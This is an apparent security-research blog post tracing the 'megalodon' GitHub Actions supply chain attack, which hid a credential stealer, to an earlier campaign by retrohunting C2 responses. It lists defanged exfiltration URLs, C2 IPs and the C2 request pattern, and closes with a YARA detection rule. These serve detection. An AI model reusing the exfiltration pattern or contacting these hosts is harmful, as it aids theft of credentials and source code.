Spectra Assure Free Trial
Get your 14-day free trial of Spectra Assure for Software Supply Chain Security
Get Free TrialMore about Spectra Assure Free TrialResearcher's Notebook: Hunting Megalodon Fossils
Analyzing C2 responses from compromised GitHub Actions linked a current threat to an earlier one, showing the value of retrohunting.
The "megalodon" supply chain attack starting on approximately May 18, 2026 compromised numerous GitHub Action YAML configuration files with a base64 encoded malicious script. The C2 used in this campaign was hosted on the IP address 216.126.225[.]129. By analyzing the response content from the web server running on this IP, the campaign is found to be related to an earlier attack that included a similar credential stealer script as well as a coin miner in a malicious Docker container. Both of these campaigns connect to a C2 framework identified as NEXUS Listener by Cisco Talos.
The Script: Malicious GitHub Actions
As reported on X by user @abh1sek, a large number of repositories were compromised and malicious GitHub actions were added to the CI configuration YAML as a base64-encoded malicious script. One example of this script is shown in the following figure.
Figure 1: Malicious GitHub Action with Base64 encoded script
Decoding the base64 reveals the malicious script. The C2 URL is highlighted at the top of the next figure.
Figure 2: Base64-decoded malicious script with C2 URL highlighted
URL analysis in Spectra Analyze shows the C2 to be hosted on RouterHosting LLC (ASN 14956). The campaign string "megalodon" can be seen in the query as well as "gh_dump" indicating GitHub dump.
Figure 3: C2 URL analysis in Spectra Analyze
The C2 response content, when it does not receive the expected request from a malicious script, contains help text from the C2 software. This help text can be seen in the following figure.
Preview Sample / Visualization
Figure 4: C2 help text response
Notice that the exfiltrated data from GitHub repos is written to files in a directory in root named "loot". The next line in the help text contains the same set of query keys as the C2 URL collected from the malicious GitHub action. This whole line of text can be converted into a YARA hexadecimal string so that escapes are not needed.
00000000 50 4f 53 54 20 2f 61 6e 79 20 3f 68 3d 26 6c 3d |POST /any ?h=&l=|
00000010 26 69 64 3d 26 74 3d 20 20 62 6f 64 79 3d 72 61 |&id=&t= body=ra|
00000020 77 20 62 79 74 65 73 |w bytes|The result is the YARA rule seen in the next figure. This rule is also provided at the end of this blog post.
Figure 5: Megalodon C2 detection YARA rule
Performing a retrohunt in Spectra Analyze reveals similar C2 response content collected two weeks ago on May 8. The results of the hunt are shown in the next figure.
Figure 6: YARA retro hunt revealing historical C2 response content
The location that this response content was collected from is shown in the Network Locations list. In the next figure, it shows the related C2 URL from the related campaign from two weeks ago. The campaign name embedded in this URL is cp2.hostable[.]com. This is shown in the next figure.
Figure 7: Historical C2 URL
An OSINT search for the IP address of this prior campaign reveals a few different reports about the activity. These are shown in the following two figures.
Figure 8: Reporting on Reddit about related campaign
Salah-Eddine El Ouali's Post
Figure 9: Reporting on LinkedIn about related campaign
Trusted CI Infrastructure is the Target
The megalodon campaign highlights how rapidly large scale supply chain attacks can spread through trusted CI infrastructure. By pivoting from the malicious GitHub Action payload to the C2 response content and historical telemetry, it is possible to connect this activity to an earlier credential theft and cryptomining campaign. This demonstrates the value of retrohunting in associating current threats with prior campaigns and adversary activity.
IOCs
hxxp[://]216[.]126[.]225[.]129:8443?h=megalodon&l=gh_dump&id=4ny72dgixww6
hxxp[://]144[.]172[.]116[.]48:8080/?h=cp2[.]hostable[.]com&l=found&id=94f7511e-08d6-421e-bdc1-d420f4c93d331777695161953
hxxp[://]144[.]172[.]116[.]48:8080/?h=MacBook&id=5BFF69DC-85FD-49E1-9E93-46A77A0A9B331777797917858&l=info
hxxp[://]144[.]172[.]116[.]48:8080/?h=cp2[.]hostable[.]com&id=94f7511e-08d6-421e-bdc1-d420f4c93d331777695161953&l=found
hxxp[://]144[.]172[.]116[.]48:8080/?h=buffalo&l=tokens&id=a49fd31b-bab5-45bb-a4ea-5b233ef5a3db1777797762271
hxxp[://]144[.]172[.]116[.]48:8080/?h=MacBook&l=info&id=5BFF69DC-85FD-49E1-9E93-46A77A0A9B331777797917858
IPs
216[.]126[.]225[.]129
144[.]172[.]116[.]48
144[.]172[.]102[.]88
172[.]86[.]127[.]128
144[.]172[.]112[.]136
144[.]172[.]117[.]112
YARA Rule
rule NexusListener_C2_1
{
meta:
author = "Malware Utkonos"
date = "2026-05-21"
description = "Detects NEXUS Listener C2 response content."
strings:
$body = { 504F5354 202F616E 79203F68 3D266C3D 2669643D
26743D20 20626F64 793D7261 77206279 746573 }
condition:
$body
}